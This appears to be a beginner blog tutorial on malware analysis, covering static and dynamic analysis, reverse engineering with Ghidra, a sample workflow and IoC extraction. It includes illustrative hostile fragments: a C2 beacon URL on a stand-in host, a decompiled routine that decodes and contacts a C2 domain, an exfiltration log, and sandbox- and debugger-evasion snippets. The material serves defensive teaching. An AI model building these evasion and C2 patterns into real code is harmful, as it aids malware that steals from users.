Thilan Dissanayaka Malware February 29, 2020

What is Malware Analysis?

You download what looks like a normal PDF. You open it. Nothing happens — or so you think. Behind the scenes, a process just spawned, a connection just opened to a server in Eastern Europe, and your keystrokes are now being logged.

How do you figure out what just happened? How do you take that suspicious file, rip it apart, and understand exactly what it does — without getting infected yourself?

That’s malware analysis. And it’s one of the most fascinating disciplines in cybersecurity.

What is Malware Analysis?

Malware analysis is the process of examining malicious software to understand:

How it works — What does the code actually do?
How it spreads — Does it exploit a vulnerability? Social engineering? USB drives?
What it targets — Files? Credentials? Network resources?
What damage it causes — Data theft? Encryption? Persistence?
How to detect and prevent it — What signatures, indicators, or behaviors can we look for?

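The end goal is to extract Indicators of Compromise (IoCs): artifacts such as file hashes, IP addresses, domain names, registry keys, or mutex names that identify the malware or its infrastructure. A file hash pins down one exact sample, while an IP address or domain may be shared or reused, so IoCs are strongest in combination. These IoCs feed into antivirus signatures, firewall rules, intrusion detection systems, and threat intelligence platforms.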

Think of it like forensic science, but for software. A detective examines a crime scene to understand what happened, who did it, and how to catch them. A malware analyst does the same thing — but the crime scene is a binary file, and the evidence is hidden in assembly code, network traffic, and system calls.

Types of Malware — Know Your Enemy

Before we analyze malware, let’s understand what we’re dealing with. Malware comes in many flavors, each with different objectives and behaviors.

Type	What It Does	Example
Virus	Attaches itself to legitimate programs and spreads when those programs run	CIH (Chernobyl virus)
Worm	Self-replicating — spreads across networks without user interaction	WannaCry, Conficker
Trojan	Disguises itself as legitimate software to trick users into running it	Zeus, Emotet
Ransomware	Encrypts your files and demands payment for the decryption key	WannaCry, LockBit, Ryuk
Spyware	Silently monitors user activity — keystrokes, screenshots, browsing history	Pegasus, FinFisher
Rootkit	Hides deep in the OS to maintain persistent, undetectable access	Sony BMG rootkit, ZeroAccess
RAT (Remote Access Trojan)	Gives the attacker full remote control over the infected machine	DarkComet, njRAT
Botnet Agent	Turns the infected machine into a “zombie” controlled by a command server	Mirai, Emotet (also a botnet)

Most modern malware doesn’t fit neatly into one category. WannaCry, for instance, was a worm (self-propagating via EternalBlue exploit) that delivered ransomware (encrypted files and demanded Bitcoin). Emotet started as a banking trojan, evolved into a botnet, and became a delivery platform for other malware. The lines are blurry.

The Three Pillars of Malware Analysis

There are three main approaches to analyzing malware, each with different depth, difficulty, and trade-offs.

1. Static Analysis — Look, Don’t Touch

Static analysis means examining the malware without executing it. You’re looking at the file itself — its structure, metadata, strings, imports, and code — but never actually running it.

This is the safest approach. Since the malware never executes, the risk of infection is minimal, provided you don't accidentally run the sample while handling it. It's also the fastest way to get a first impression.

What you do in static analysis:

File identification — What type of file is it? PE executable? ELF binary? Office document with macros?
Hashing — Generate SHA256/MD5 hashes to fingerprint the sample and check if it’s already known
String extraction — Pull readable text from the binary. You’d be surprised how often malware contains URLs, IP addresses, error messages, or even the author’s username in plain text
PE header analysis — For Windows executables, examine the imports (what Windows APIs does it call?), exports, sections, and timestamps
Packer detection — Is the binary packed or obfuscated? Packers like UPX compress the binary to hide its true contents
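To make the PE header bullet a bit more concrete, here is a minimal sketch that reads three header fields using only Python's standard library. The function name parse_pe_header and the returned keys are illustrative choices, not something from a real tool; in practice you would more likely reach for a library such as pefile.

```python
import struct
from datetime import datetime, timezone

# Only two common Machine values; anything else is shown as hex.
MACHINE_TYPES = {0x014C: "x86", 0x8664: "x64"}

def parse_pe_header(data: bytes) -> dict:
    """Return a few fields from the DOS and COFF headers of a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # e_lfanew (offset 0x3C) holds the file offset of the PE signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    if len(data) < pe_offset + 12:
        raise ValueError("truncated COFF header")
    # The COFF header starts right after the signature:
    # Machine (2 bytes), NumberOfSections (2 bytes), TimeDateStamp (4 bytes).
    machine, sections, timestamp = struct.unpack_from("<HHI", data, pe_offset + 4)
    return {
        "machine": MACHINE_TYPES.get(machine, hex(machine)),
        "sections": sections,
        "compiled": datetime.fromtimestamp(timestamp, tz=timezone.utc),
    }
```

Treat the compile timestamp as a hint only, since authors can set it to any value they like.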

Example — extracting strings from a suspicious binary:

$ strings suspicious.exe | head -20
!This program cannot be run in DOS mode.
.text
.rdata
.data
kernel32.dll
CreateFileA
WriteFile
WinExec
http://evil-c2-server.com/beacon
cmd.exe /c whoami
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Look at that. Without running a single line of code, we already have strong evidence that this binary:

Calls CreateFileA and WriteFile (file system operations)
Uses WinExec (executing commands)
Reaches out to http://evil-c2-server.com/beacon (command & control server)
Runs cmd.exe /c whoami (reconnaissance)
Writes to the Run registry key (persistence — it wants to survive reboots)

That's a lot of intelligence from just strings. Of course, sophisticated malware rarely leaves its strings in plaintext; its authors encrypt or obfuscate them. Still, plenty of samples in the wild are sloppy.
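If you want to see what string extraction boils down to, here is a rough Python sketch. It also looks for UTF-16LE strings, which Windows binaries use a lot and which a plain ASCII scan misses. The function name extract_strings and the default minimum length of 4 are my own choices for illustration.

```python
import re

def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return printable ASCII and UTF-16LE strings of at least min_len characters."""
    # Runs of printable ASCII bytes (space through tilde).
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    # The same characters encoded as UTF-16LE: each one followed by a zero byte.
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16le") for m in utf16_re.finditer(data)]
    return found
```

To use it on a sample, read the file in binary mode and pass the bytes in, for example extract_strings(open(path, "rb").read()).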

Example — checking a hash on VirusTotal:

$ sha256sum suspicious.exe
a1b2c3d4e5f6... suspicious.exe

Take that hash, search it on VirusTotal, and you’ll instantly see if 70+ antivirus engines have already flagged it. If it’s a known sample, someone has probably already written a full report on it.
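When you have many samples, hashing them from a script is handier than running sha256sum by hand. A minimal sketch with Python's hashlib follows; the function name hash_file and the 64 KiB chunk size are arbitrary choices on my part.

```python
import hashlib

def hash_file(path: str, chunk_size: int = 65536) -> dict[str, str]:
    """Compute MD5 and SHA-256 of a file without loading it all into memory."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as fh:
        # Read fixed-size chunks until read() returns an empty bytes object.
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return {"md5": md5.hexdigest(), "sha256": sha256.hexdigest()}
```

The file is only read, never executed, so this stays within static analysis.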

2. Dynamic Analysis — Let It Run (Safely)

Dynamic analysis means executing the malware in a controlled environment and observing what it does. Instead of reading the code, you watch its behavior — what files it creates, what network connections it makes, what registry keys it modifies.

This is more dangerous than static analysis because the malware is actually running. That’s why you always do this inside a sandbox — an isolated virtual machine that you can snapshot before execution and revert after.

What you observe in dynamic analysis:

Process activity — What processes does it spawn? Does it inject into other processes?
File system changes — Does it create, modify, or delete files?
Registry changes — Does it add persistence keys? Modify security settings?
Network traffic — What domains does it contact? What data does it send?
API calls — What system calls does the malware make at runtime?

Setting up a safe analysis environment:

The golden rule — never analyze malware on your host machine. Here’s a typical setup:

Create a VM — Use VirtualBox or VMware. Windows 10 is the most common target OS
Take a clean snapshot — Before you introduce any malware
Disable networking (or route through an isolated network) — You don’t want the malware calling home from your network
Install analysis tools inside the VM — Process Monitor, Wireshark, Regshot, etc.
Copy the sample into the VM and execute it
Observe everything — Capture network traffic, file changes, registry modifications
Revert to snapshot when done — The VM is clean again, as if nothing happened
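The snapshot and revert steps above are easy to forget, so it can help to script them. Below is a small sketch that builds the corresponding VBoxManage commands for VirtualBox. The VM name "win10-lab" and snapshot name "clean" used in the note below are hypothetical, and the helper defaults to a dry run so nothing is executed unless you ask for it.

```python
import subprocess

def vbox_commands(vm: str, snapshot: str) -> dict[str, list[str]]:
    """Build the VBoxManage command lines for one analysis cycle."""
    return {
        "take_snapshot": ["VBoxManage", "snapshot", vm, "take", snapshot],
        "start": ["VBoxManage", "startvm", vm, "--type", "headless"],
        "power_off": ["VBoxManage", "controlvm", vm, "poweroff"],
        "revert": ["VBoxManage", "snapshot", vm, "restore", snapshot],
    }

def run_step(commands: dict[str, list[str]], step: str, dry_run: bool = True) -> list[str]:
    """Print the command in dry-run mode, otherwise execute it."""
    cmd = commands[step]
    if dry_run:
        print("would run:", " ".join(cmd))
    else:
        subprocess.run(cmd, check=True)  # raises if VBoxManage fails
    return cmd
```

A typical cycle would call run_step for "start", then after the analysis "power_off" followed by "revert", using vbox_commands("win10-lab", "clean").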

Example — watching malware behavior with Process Monitor:

After detonating the sample in your sandbox, Process Monitor (Procmon) shows you every file operation, registry access, and network call in real time:

Operation       Path                                                         Result
CreateFile      C:\Users\Admin\AppData\Local\Temp\svchost.exe                SUCCESS
RegSetValue     HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update    SUCCESS
TCP Connect     185.141.27.98:443                                            SUCCESS
CreateFile      C:\Users\Admin\Documents\*.docx                              SUCCESS
WriteFile       C:\Users\Admin\Documents\README_DECRYPT.txt                  SUCCESS

From this we can see the malware:

Drops a copy of itself as svchost.exe in the Temp folder (disguised as a system process)
Adds itself to the Run key (persistence)
Connects to 185.141.27.98 on port 443 (C2 communication)
Accesses .docx files (likely encrypting them)
Drops a ransom note (README_DECRYPT.txt)

That’s ransomware behavior — and we figured it out just by watching.
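Reading a trace like this by eye works for five lines, but real captures have thousands. Here is a rough sketch of how you might tag events automatically. The rules and labels are simplified assumptions of mine, not a real detection ruleset, and the (operation, path) tuples stand in for rows you would export from Procmon.

```python
import re

# (label, operation, path pattern): deliberately loose, illustrative rules.
RULES = [
    ("persistence", "RegSetValue", re.compile(r"\\CurrentVersion\\Run\\", re.I)),
    ("dropped executable", "CreateFile", re.compile(r"\\Temp\\.*\.exe$", re.I)),
    ("ransom note", "WriteFile", re.compile(r"(README|DECRYPT|RECOVER).*\.txt$", re.I)),
    ("network connection", "TCP Connect", re.compile(r"^\d{1,3}(\.\d{1,3}){3}:\d+$")),
]

def tag_events(events):
    """Return (label, path) for every event that matches a rule."""
    tags = []
    for operation, path in events:
        for label, rule_op, pattern in RULES:
            if operation == rule_op and pattern.search(path):
                tags.append((label, path))
    return tags
```

Keep in mind that Procmon also reports CreateFile when an existing file is merely opened, so a hit on the "dropped executable" rule is a lead to check, not proof.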

Automated sandboxes:

If you don’t want to set up everything manually, automated sandboxes do the heavy lifting for you:

Cuckoo Sandbox — Open-source, self-hosted. Submit a file, and it runs it in a VM, captures everything, and generates a full report
Any.Run — Interactive online sandbox. You can watch the malware execute in real time in your browser
Hybrid Analysis — Free online sandbox by CrowdStrike. Upload a sample and get a detailed behavior report
Joe Sandbox — Commercial-grade, incredibly detailed analysis

3. Reverse Engineering — Reading the Blueprint

Reverse engineering is the deepest level of analysis. You take the compiled binary, disassemble it back into assembly code (or decompile it into pseudo-C), and read through the logic line by line.

This is where you go from “this malware contacts a C2 server” to “this malware uses a custom XOR-based encryption algorithm with key 0x4F to encode its C2 communications, and it falls back to a DGA (Domain Generation Algorithm) if the primary C2 is unreachable.”

This is the hard part. It requires:

Understanding of x86/x64 assembly language
Knowledge of OS internals (Windows API, PE format, memory management)
Patience — a lot of patience
Familiarity with disassemblers and debuggers

Key tools for reverse engineering:

Tool	Type	Notes
Ghidra	Disassembler/Decompiler	Free, open-source (by NSA). Excellent decompiler
IDA Pro	Disassembler/Decompiler	Industry standard. Expensive, but the best
x64dbg	Debugger	Free, great for dynamic debugging on Windows
Radare2/Cutter	Disassembler/Debugger	Free, open-source. Steep learning curve
Binary Ninja	Disassembler	Clean UI, good API for scripting

Example — decrypting hardcoded strings with Ghidra:

You load the malware into Ghidra, and the decompiler shows you something like this:

void decrypt_string(char *encrypted, int len) {
    for (int i = 0; i < len; i++) {
        encrypted[i] = encrypted[i] ^ 0x4F;
    }
}

void contact_c2(void) {
    char c2_domain[] = {0x2A, 0x39, 0x26, 0x23, 0x62, 0x2C, 0x7D, 0x62, ...};
    decrypt_string(c2_domain, sizeof(c2_domain));
    // c2_domain is now "evil-c2-server.com"
    connect_to_server(c2_domain);
}

The malware stored its C2 domain as XOR-encrypted bytes — strings wouldn’t have caught this. But by reverse engineering the decryption function, we recovered the actual domain. That’s an IoC we can now feed into our detection systems.
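Once you know the scheme is single-byte XOR, you can reproduce the decryption outside the malware, and even recover the key without reading the decryption routine. The sketch below encodes the example domain itself so it is self-contained. The function names and the ".com" marker are my own assumptions; with a real sample you would search for whatever plaintext you expect to find.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (the same call encodes and decodes)."""
    return bytes(b ^ key for b in data)

def brute_force_xor(data: bytes, marker: bytes = b".com"):
    """Try all 256 keys and return (key, plaintext) pairs that contain marker."""
    hits = []
    for key in range(256):
        plain = xor_bytes(data, key)
        if marker in plain:
            hits.append((key, plain))
    return hits

# Encode the example domain with the key from the decompiled function.
encoded = xor_bytes(b"evil-c2-server.com", 0x4F)
for key, plain in brute_force_xor(encoded):
    print(hex(key), plain.decode("ascii", errors="replace"))
```

Single-byte XOR has only 256 possible keys, which is why it hides strings from a casual look but barely slows down an analyst.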

This is why basic static analysis alone isn't always enough. Sophisticated malware obfuscates everything: strings, API calls, control flow. Reverse engineering peels back those layers.

A Complete Analysis Workflow

Let’s put it all together. Here’s a realistic workflow for analyzing a suspicious sample from start to finish.

Step 1: Sample Collection and Safety

You receive a suspicious file — maybe from a honeypot, an email attachment, or an incident response engagement.

# First, hash it for identification
$ sha256sum sample.exe
e3b0c44298fc1c149afbf4c8996fb924...

# Check the hash on VirusTotal
# If it's already known, read existing reports first

# Identify the file type
$ file sample.exe
PE32 executable (GUI) Intel 80386, for MS Windows

Step 2: Static Analysis

# Extract strings
$ strings -n 8 sample.exe > strings_output.txt

# Check for packers
$ diec sample.exe    # Detect It Easy (console version)
# Result: UPX 3.96 detected

# Unpack if needed
$ upx -d -o sample_unpacked.exe sample.exe

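# Analyze PE headers with pefile (Python; install with: pip install pefile)
$ python3 -c "
import pefile
pe = pefile.PE('sample_unpacked.exe')
# DIRECTORY_ENTRY_IMPORT is absent when the file has no import table
for entry in getattr(pe, 'DIRECTORY_ENTRY_IMPORT', []):
    print(entry.dll.decode())
    for func in entry.imports:
        # Functions imported by ordinal have no name
        print(f'  {func.name.decode() if func.name else hex(func.ordinal)}')
"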

Suspicious imports to watch for:

API Call	Why It’s Suspicious
`VirtualAlloc` / `VirtualProtect`	Allocating executable memory (shellcode injection)
`CreateRemoteThread`	Injecting code into another process
`WriteProcessMemory`	Writing into another process’s memory
`URLDownloadToFile`	Downloading files from the internet
`RegSetValueEx`	Modifying the registry (persistence)
`CryptEncrypt`	Encrypting data (ransomware indicator)
`IsDebuggerPresent`	Anti-analysis — checking if it’s being debugged
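Checking a long import list against this table by hand gets tedious, so here is a small sketch that does the lookup. It works on a plain list of import names (however you obtained them) and treats the A and W suffixes of Win32 functions as the same API. The descriptions are shortened from the table, and the function name flag_imports is made up for this example.

```python
SUSPICIOUS = {
    "VirtualAlloc": "allocates memory that can be made executable",
    "VirtualProtect": "changes memory protection",
    "CreateRemoteThread": "starts a thread in another process",
    "WriteProcessMemory": "writes into another process's memory",
    "URLDownloadToFile": "downloads a file from the internet",
    "RegSetValueEx": "modifies the registry",
    "CryptEncrypt": "encrypts data",
    "IsDebuggerPresent": "checks for an attached debugger",
}

def flag_imports(import_names):
    """Map each suspicious import to the reason it deserves a closer look."""
    flagged = {}
    for name in import_names:
        base = name
        # Strip the ANSI/Unicode suffix, e.g. RegSetValueExW -> RegSetValueEx.
        if name.endswith(("A", "W")) and name[:-1] in SUSPICIOUS:
            base = name[:-1]
        if base in SUSPICIOUS:
            flagged[name] = SUSPICIOUS[base]
    return flagged
```

Plenty of legitimate software imports these functions too, so treat a hit as a reason to dig deeper and not as a verdict.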

Step 3: Dynamic Analysis

Fire up your sandbox VM, take a snapshot, and detonate the sample.

Run these tools simultaneously:

Process Monitor — Capture all file, registry, and network operations
Wireshark — Capture all network traffic
Regshot — Take a registry snapshot before and after execution to see what changed
Process Hacker — Monitor running processes and their memory

Execute the sample and let it run for a few minutes. Some malware has sleep timers or checks for user activity before activating.
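The before-and-after idea behind Regshot is simple enough to sketch in a few lines. This version compares two snapshots held as plain dictionaries (key path to value). How you collect those snapshots is left open, and the function name diff_snapshots is just an illustrative choice.

```python
def diff_snapshots(before: dict, after: dict) -> dict:
    """Compare two {key: value} snapshots taken before and after execution."""
    added = {k: after[k] for k in after.keys() - before.keys()}
    removed = {k: before[k] for k in before.keys() - after.keys()}
    changed = {
        k: (before[k], after[k])
        for k in before.keys() & after.keys()
        if before[k] != after[k]
    }
    return {"added": added, "removed": removed, "changed": changed}
```

The same function works for file listings if you snapshot a directory as a mapping from path to file hash.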

Step 4: Analyze the Results

After execution, you review:

=== Network Connections ===
DNS query: update-service.malwaredomain.com → 185.141.27.98
HTTPS connection to 185.141.27.98:443
POST /gate.php with encrypted body (likely exfiltrated data; the request is only readable if TLS is intercepted)

=== File System Changes ===
Created: C:\Users\Admin\AppData\Local\Temp\updater.exe (copy of itself)
Created: C:\Users\Admin\AppData\Roaming\config.dat (encrypted config)
Modified: Multiple .docx and .xlsx files in Documents folder

=== Registry Changes ===
Added: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
  Value: C:\Users\Admin\AppData\Local\Temp\updater.exe

=== Process Activity ===
sample.exe → spawned cmd.exe → executed "whoami" and "ipconfig"
sample.exe → injected into explorer.exe via CreateRemoteThread

Step 5: Extract IoCs

From all of this analysis, we compile our Indicators of Compromise:

Indicators of Compromise:
  File Hashes:
    - SHA256: e3b0c44298fc1c149afbf4c8996fb924...  (placeholder: SHA-256 of empty input)
    - MD5: d41d8cd98f00b204e9800998ecf8427e  (placeholder: MD5 of empty input)

  Network:
    - Domain: update-service.malwaredomain.com
    - IP: 185.141.27.98
    - URL: https://185.141.27.98/gate.php
    - User-Agent: "Mozilla/5.0 (compatible; MSIE 10.0)"

  Host:
    - File: C:\Users\*\AppData\Local\Temp\updater.exe
    - Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
    - Mutex: Global\XYZ_MUTEX_001

  Behavior:
    - Enumerates documents (.docx, .xlsx, .pdf)
    - Process injection via CreateRemoteThread into explorer.exe
    - Exfiltrates data via HTTPS POST to /gate.php

These IoCs are now actionable. They can be shared with your security team, fed into your SIEM, used to write firewall rules, or published in a threat intelligence report.
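To show what "actionable" can look like, here is a minimal sketch that stores a few of the indicators above as structured data and checks log lines against them. The log format in the usage note is invented for the example, and the plain substring matching is a simplification; a SIEM would parse fields properly.

```python
import json

# A subset of the indicators collected above.
IOCS = {
    "domains": ["update-service.malwaredomain.com"],
    "ips": ["185.141.27.98"],
    "registry": [r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate"],
}

def match_iocs(log_lines, iocs=IOCS):
    """Return (line, indicator) pairs for log lines that contain an indicator."""
    hits = []
    for line in log_lines:
        lowered = line.lower()
        for values in iocs.values():
            for indicator in values:
                if indicator.lower() in lowered:  # naive, case-insensitive match
                    hits.append((line, indicator))
    return hits

# JSON is an easy format to hand to other tools or teammates.
print(json.dumps(IOCS, indent=2))
```

Feeding it a line such as "tcp 10.0.0.5 -> 185.141.27.98:443" would return that line paired with the matching IP.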

Anti-Analysis Techniques — Malware Fights Back

Here’s where it gets interesting. Malware authors know their creations will be analyzed, so they build in defenses. Some common anti-analysis techniques:

VM Detection

The malware checks if it’s running inside a virtual machine. If yes, it assumes it’s being analyzed and either does nothing or self-destructs.

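// Check for the VMware Tools registry key
HKEY hKey;
if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\VMware, Inc.\\VMware Tools",
                  0, KEY_READ, &hKey) == ERROR_SUCCESS) {
    RegCloseKey(hKey);
    ExitProcess(0);  // VMware Tools found, bail out
}

// Check for VirtualBox artifacts
if (GetModuleHandleA("VBoxHook.dll") != NULL) {
    ExitProcess(0);  // We're being analyzed, bail out
}

// Check CPU instruction timing
// CPUID typically traps to the hypervisor, so it takes measurably longer inside a VM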

Counter: Use bare-metal analysis machines for sophisticated samples, or patch VM artifacts to make the environment look more like a real machine.
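Before you trust a sandbox, it is worth checking which artifacts it exposes. One more artifact that malware commonly looks at, beyond the registry and DLL checks shown above, is the network adapter's MAC address prefix. The sketch below covers only a handful of well-known VMware and VirtualBox prefixes, so treat the table as incomplete; the function names are my own.

```python
import uuid

# Well-known default MAC prefixes (OUIs) of virtual network adapters.
VM_MAC_PREFIXES = {
    "00:05:69": "VMware",
    "00:0C:29": "VMware",
    "00:1C:14": "VMware",
    "00:50:56": "VMware",
    "08:00:27": "VirtualBox",
}

def vm_vendor_from_mac(mac: str):
    """Return the hypervisor vendor for a MAC address, or None if unknown."""
    normalized = mac.upper().replace("-", ":")
    return VM_MAC_PREFIXES.get(normalized[:8])

def local_mac() -> str:
    """Format the MAC address reported by uuid.getnode() as AA:BB:CC:DD:EE:FF."""
    node = uuid.getnode()
    return ":".join(f"{(node >> shift) & 0xFF:02X}" for shift in range(40, -8, -8))
```

Running vm_vendor_from_mac(local_mac()) inside your analysis VM tells you whether this particular giveaway is present; most hypervisors let you change the adapter's MAC address in the VM settings.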

Anti-Debugging

The malware detects if a debugger is attached and changes its behavior.

if (IsDebuggerPresent()) {
    // Run benign code instead of malicious payload
    MessageBox(NULL, "Hello World!", "Legit App", MB_OK);
    return;
}

Counter: Patch IsDebuggerPresent to always return false, or use kernel-level debuggers that are harder to detect.
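To verify that a counter like this actually works, it helps to be able to run the same check yourself. Here is a small sketch that calls IsDebuggerPresent through ctypes on Windows and, on Linux, reads the TracerPid field that serves a similar purpose there. The Linux part is my addition for comparison, and the function names are illustrative.

```python
import sys

def tracer_pid(status_text: str) -> int:
    """Parse the TracerPid field from the contents of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1])
    return 0

def debugger_attached():
    """Return True or False where a check is available, otherwise None."""
    if sys.platform == "win32":
        import ctypes
        # The same API the malware calls in the snippet above.
        return bool(ctypes.windll.kernel32.IsDebuggerPresent())
    if sys.platform.startswith("linux"):
        # A non-zero TracerPid means another process is tracing this one.
        with open("/proc/self/status") as fh:
            return tracer_pid(fh.read()) != 0
    return None
```

If this still reports a debugger after you applied your patch or plugin, the malware will see it too.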

Packing and Obfuscation

The malware’s real code is compressed or encrypted. At runtime, it unpacks itself into memory. Static analysis sees only the packer stub, not the actual malicious code.

Counter: Let the malware unpack itself in a debugger, then dump the unpacked code from memory.
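Before you can unpack anything, you have to notice that it is packed. A common heuristic is byte entropy: compressed or encrypted data looks close to random, so its Shannon entropy approaches 8 bits per byte. Here is a minimal sketch; the 7.0 threshold is a rule of thumb I'm assuming here, not a hard limit.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Return the Shannon entropy of data in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Flag data whose entropy suggests compression or encryption."""
    return shannon_entropy(data) >= threshold
```

Run it per section instead of over the whole file when you can, since a single high-entropy section can hide behind a lot of ordinary code and padding.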

Time Bombs

The malware waits — sometimes minutes, sometimes days — before activating. If a sandbox only runs for 60 seconds, it’ll see nothing malicious.

Counter: Fast-forward the system clock in the sandbox, hook and shorten the malware's sleep calls, or use sandboxes with extended execution times.

Essential Tools — Your Analysis Toolkit

Here’s a summary of the tools we’ve mentioned, organized by purpose.

Category	Tool	Platform	Cost
Static Analysis	`strings`, `file`, `xxd`	Linux/Mac	Free
	Detect It Easy (DIE)	Windows/Linux	Free
	`pefile` (Python library)	Cross-platform	Free
	PEStudio	Windows	Free
Dynamic Analysis	Process Monitor (Procmon)	Windows	Free
	Process Hacker	Windows	Free
	Regshot	Windows	Free
	Wireshark	Cross-platform	Free
Sandboxes	Cuckoo Sandbox	Self-hosted	Free
	Any.Run	Online	Free tier
	Hybrid Analysis	Online	Free
Reverse Engineering	Ghidra	Cross-platform	Free
	IDA Pro / IDA Free	Cross-platform	Paid / Free
	x64dbg	Windows	Free
	Radare2 / Cutter	Cross-platform	Free
Online Analysis	VirusTotal	Web	Free
	MalwareBazaar	Web	Free
	URLhaus	Web	Free

You don’t need all of these to get started. A solid beginner setup would be: a Windows VM + Process Monitor + Wireshark + Ghidra + VirusTotal. That’s enough to perform basic static and dynamic analysis on most samples.

Getting Started — Where to Practice

You can’t learn malware analysis without samples to analyze. Here are some safe, legal resources:

MalwareBazaar (bazaar.abuse.ch) — A repository of malware samples shared by the security community. Free to download (you’ll need an account)
theZoo (github.com/ytisf/theZoo) — A curated collection of malware samples for research purposes
Any.Run — Watch other people’s analysis sessions to learn what to look for
Practical Malware Analysis (book by Sikorski & Honig) — The gold standard for learning. Comes with lab exercises and sample files
Malware Unicorn’s workshops — Free, hands-on reverse engineering workshops

Start with static analysis — it’s the safest and gives you quick wins. Once you’re comfortable, move to dynamic analysis in a VM. And when you’re ready for the deep end, pick up Ghidra and start reverse engineering.

Final Thoughts

Malware analysis is one of those fields that sits at the intersection of programming, security, and detective work. Every sample is a puzzle — the author is trying to hide what it does, and your job is to figure it out anyway.

What I find most fascinating is that it forces you to understand how computers actually work — at the OS level, at the network level, at the assembly level. You can’t analyze a rootkit without understanding how the kernel manages processes. You can’t spot a C2 beacon without understanding how DNS and HTTP work. You can’t reverse engineer an encryption routine without understanding the math behind it.

If you’re interested in cybersecurity and want to understand the offensive side from a defensive perspective — malware analysis is an incredible place to start.

Stay curious, and happy hunting!